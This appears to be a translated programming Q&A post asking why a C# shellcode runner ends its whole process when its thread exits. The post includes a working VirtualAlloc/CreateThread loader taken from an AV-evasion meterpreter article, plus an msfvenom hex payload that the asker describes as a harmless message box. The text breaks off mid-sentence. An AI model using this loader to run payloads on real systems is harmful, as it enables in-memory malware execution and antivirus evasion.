我正在尝试编写一个执行任意 shellcode 的 C# 函数。它似乎正在工作,除了当创建的线程退出时,整个进程终止。我自己没有想出这段代码,而是主要从这个网站得到它:https ://webstersprodigy.net/2012/08/31/av-evading-meterpreter-shell-from-a-net-service/
下面是执行 shellcode 的函数:
public void ExecuteShellCode(String code)
{
//pipe msfvenom raw to xxd -p -c 999999 (for example)
byte[] shellcode = StringToByteArray(code);
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x1000, 0x40);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
我使用以下示例调用它:
(注意——你可能不应该从互联网上运行随机的 shellcode,这个例子是无害的,但你不应该相信我的话)
我用 msfvenom 生成了 shellcode——它只是弹出一个消息框。
rsh.ExecuteShellCode(@"d9eb9bd97424f431d2b27731c9648b71308b760c8b761c8b46088b7e208b36384f1875f35901d1ffe1608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3b20829d489e589c2688e4e0eec52e89fffffff894504bb7ed8e273871c2452e88effffff894508686c6c20416833322e64687573657230db885c240a89e656ff550489c250bba8a24dbc871c2452e85fffffff686f6b582031db885c240289e368732158206869656e64687920467268486f776431c9884c240e89e131d252535152ffd031c050ff5508");
while (true)
{
Thread.Sleep(42);
}
如果您需要将字符串转换为字节的代码,请参见此处:
private static byte[] StringToByteArray(String opcodes)
{
int NumberChars = opcodes.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(opcodes.Substring(i, 2), 16);
return bytes;
}
我的想法:
我觉得有一些问题需要在 shellcode 中以某种方式指定我的程序的返回地址,因为 shellcode 正在杀死整个过程。我用 msfvenom 尝试了所有的“EXITFUNC”参数,包括 SEH、Process 和 Thread……但没有运气。我的示例 shellcode 有问题吗?在那儿